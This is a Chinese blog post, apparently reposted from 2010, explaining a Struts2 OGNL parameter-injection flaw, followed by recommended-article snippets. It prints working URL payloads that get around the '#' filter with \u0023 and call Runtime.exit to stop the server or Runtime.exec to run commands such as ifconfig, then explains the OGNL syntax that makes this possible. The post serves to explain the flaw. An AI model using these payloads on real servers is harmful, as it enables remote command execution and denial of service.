java struts 漏洞_Struts2.1.8以下的漏洞

最新推荐文章于 2024-06-08 07:30:31 发布
最新推荐文章于 2024-06-08 07:30:31 发布
阅读量102 收藏
点赞数
文章标签: java struts 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31961675/article/details/114559647
版权

?('\u0023_memberAccess[\'allowStaticMethodAccess\']')

(meh)=true&(aaa)

(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')

(\u0023foo\u003dnew%20java.lang.Boolean("false")))

&(asdf)

(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

?('#_memberAccess['allowStaticMethodAccess']')(meh)=true

&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new java.lang.Boolean("false")))

&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1

OGNL处理时最终的结果就是

java.lang.Runtime.getRuntime().exit(1);

----------------------------------------------------------------

?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true

&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))

&(asdf)(('\u0023rt.exec("ifconfig")')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

OGNL处理时最终的结果就是

java.lang.Runtime.getRuntime().exec("ifconfig")

以上为struts2.1.2版本洗一下的一个漏洞。首先铺垫一下,上面代码执行结果为停掉当前运行的容器,getRuntime().exit(1);退出。

首先这个漏洞出现是因为OGNL 的用法。

简单的介绍一下ognl概念去看百科吧,说一下用法:

OGNL的方法调用:

OGNL是在运行时调用方法的,这使得它无法做强制的类型检查,OGNL会去检索一个和它方法的各个参数最接近的一个方法进行使用,

如果有多个方法满足这个条件,那么OGNL将任意调用其中的一个.(NULL和所有原始类型匹配,所以最有可能返回一个出乎意料的调用).

OGNL也支持new object()的方法,产生一个新的对象,但是除了在java.lang包里的对象外,必须指明对象所在包的全名.

OGNL支持直接调用类的静态方法.@class@method(args)

eg:@abs(-12.345);

@Java.lang.Math@floor(3.25);

@Java.lang.Math@Sqrt(4);

OGNL操作集合

1操作列表Lists

OGNL中Person in {"chinese", "japanese", '"Amercian"}

2 操作映射

OGNL中#{"foo" : "foovalue", "bar" : "barvalue"}

OGNL有一个简化变量机制(在变量前加符号#),所有OGNL变量在整个表达式里是全局的。

eg:#var

#var = 99

listeners.size().( #this > 100 ? 2 * #this : 20 + #this ) 调用listeners的size()并与100比较,

#this为size的值,如果大于100则是返回两倍的size值。

可以这样创建一个Map:

#{“foo”: “foo value”, “bar”: “bar value” }

#@java.util.LinkedHashMap@{“foo”: “foo value”, “bar”: “bar value” }

OGNL 上下文变量

#application

#session

#request

#parameters

#attr

以上各值分别对应应用程序的不同层次的值,为了达到程序不被恶意修改在xwork包 com.opensymphony.xwork2.interceptor.PrepareInterceptor类中对#号进行了过滤。

但没有过滤java中的unicode码,#的是\u0023

(未完待续。。)

我们有的时候等的不是机会,而是时间,等时间让我们自己改变。

posted on 2010-08-09 09:23 王小同 阅读(1283) 评论(0)  编辑  收藏

赵阿萌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Struts2漏洞
2403_82795493的博客
02-20 1955
Struts 是Apache软件基金会(ASF)赞助的一个开源项目,通过采用JavaServlet/JSP技术,实现基于Java EEWeb应用的MVC设计模式的应用框架,Struts 2是Struts的下一代产品,是在 Struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。Struts2框架广泛应用于政府、公安、交通、金融行业和运营商的网站建设,作为网站开发的底层模板使用。
struts2.1.8
07-10
Struts2.1.8是Apache软件基金会的开源Java Web应用程序框架,用于构建MVC(模型-视图-控制器)架构的应用程序。该版本在2007年发布,是Struts2框架的一个早期版本,提供了许多核心特性和功能,为开发者提供了构建...
Struts2.1.8 Ognl 漏洞浅析和解决方案
xlxxcc的专栏
08-21 1万+
前面的话   工作了好几点,一直都没有认认真真的去写过什么东西,趁着最近这段时间有空,总结一下这几年在工作中的一些经验,尤其是Struts2 Ognl 漏洞,当年不知道影响了多少个互联网企业。现在把他记录下来,作为对几年工作的一个回忆吧。   如果您是对Struts2不熟悉,又想测试Struts2 Ognl 漏洞的读者,请下先移步到Struts2 入门示例,里面有一个简单的Struts示例,
Java安全』Struts2 2.1.8.1 参数名OGNL注入漏洞S2-003复现与浅析
Ho1aAs‘s Blog
08-01 1122
Struts2解析参数名称使用了OGNL表达式,构建恶意OGNL表达式会造成注入。
Struts2框架漏洞总结与复现(上) 含Struts2检测工具
最新发布
qq_53058639的博客
06-08 1312
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。时使用了重定向类型,并且还使用paramname作为重定向变量,UserAction中定义有一个name变量,当触发redirect类型返回时,Struts2获取使用{name}获取其值,在这个过程中会对name参数的值执行OGNL表达式解析,从而可以插入任何OGNL表达式导致命令执行。在账号密码的输入框中测试是否存在漏洞
漏洞分析|S2-066—Apache Struts2 文件上传漏洞(CVE-2023-50164)
xuandaoren的博客
12-23 1424
补丁修复的HttpParameters大小写敏感问题,如果此时通过参数绑定传递MyFaceFileName,在上传表单名中传递myFace(inputName+FileName),此时HttpParameters里面是myFaceFileName与MyFaceFileName,这个时候key不一样,可以同时存在于HttpParameters的。发现对HttpParameters进行了修改,对参数大小写进行了控制,强制将参数都转换成了小写,漏洞和大小写参数有关。
框架/组件漏洞系列1:struts2漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-03 9458
前言: 本篇文章中复现的漏洞不是特别全面,但是挑选了最近两年的漏洞进行复现,旨在对漏洞进行有用复现,毕竟一些老漏洞已经基本不存在了。 一、Struts简介 1、简介 基本介绍: Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实现了基于[Java EE](https://.
struts-2.1.8jar包
04-17
Struts 2.1.8 是一个非常重要的Java Web开发框架,它基于MVC(Model-View-Controller)设计模式,极大地简化了企业级应用程序的构建。Struts 2是Struts 1的升级版,提供了更多的功能和改进,使得开发者能够更高效地...
开发框架struts2.1.8.zip
01-12
综上所述,"开发框架struts2.1.8.zip"包含了Struts 2的核心组件和特性,为Java Web开发提供了强大的支持。通过深入学习和应用这个框架,开发者可以构建出结构清晰、可维护性高的应用程序,并享受到Struts 2带来的...
Struts2升级到2.5.30,问题解决及过程记录
05-05
Struts2是一个流行的Java web框架,它为开发者提供了一种模型-视图-控制器(MVC)架构,便于构建可维护、可扩展的web应用程序。随着技术的发展,框架也需要不断更新以修复安全漏洞、提高性能并引入新特性。在本文中...
Struts2漏洞分析与研究之Ognl机制探讨
热门推荐
Exploit的小站~
05-10 2万+
转载请注明出处谢谢:http://blog.csdn.net/u011721501?viewmode=list 0、前言 最近专业实训上需要添加一个struts2的批量利用程序,倒腾半天,我发现我对struts2系列的漏洞根本就不懂,用是会用,但是对我来说还是不够,网上也没有什么好的分析文章来老老实实分析每一个细节。所以我这里就结合每天的研究写一些博客share出来。这是第一篇,也是昨天研究的...
struts1漏洞总结及整改方案
08-07
因为最近攻防演练,对公司的资产进行梳理,发现部分应用还使用的struts1框架,所以赶快收集整理了相关的漏洞以及相关的整改方案。提供给大家。
struts2漏洞升级
08-02
NULL 博文链接:https://xdjava.iteye.com/blog/1972351
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
04-26
1.严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。 2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar --来源 http://mvnrepository.com/artifact/org.apach e.struts/struts2-spring-plugin/2.3.32
struts1.3.15.1高危漏洞修复版ssh包
08-15
ssh1.3.15.1-struts最新高危漏洞修复版ssh整合jar包。解压后直接buildPath.
Struts2漏洞检查工具
02-14
struts2检查和利用工具!
渗透知识-Struts2漏洞
Jian Sun_的博客
02-11 4725
Struts2漏洞利用实例 如果存在struts2漏洞的站,administrator权限,但是无法加管理组,内网,shell访问500. 1.struts2 漏洞原理:struts2是一个框架,他在处理action的时候,调用底层的getter/setter来处理http的参数,将每一个http的参数声明为一个ONGL。 2.struts2 漏洞利用: 步骤如下:1>验证漏洞: 证明了存在struts2漏洞。 2>执行命令: whoami 很大的administrat...
18-struts2安全漏洞及解决办法
高调做事,低调做人!
05-09 1359
http://blog.csdn.net/chals115/article/details/9387239 struts2安全漏洞及解决办法 分类: struts2 互联网 安全 2013-07-20 00:43 172人阅读 评论(0) 收藏 举报 struts2安全漏洞filter           7月17日,世界知名开源软件struts 2爆出了2个高危漏
Struts2 漏洞集合
kali_Ma的博客
01-21 7447
Struts2 漏洞集合 总结了一部分 Strtus2 漏洞,虽然现在这部分的漏洞很少了,但也是学习的一部分,收集的并不全面,后续会做补充。 漏洞环境搭建可以使用在线的 Vulfocus ,或者使用docker部署 S2-001 (CVE-2007-4556) 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值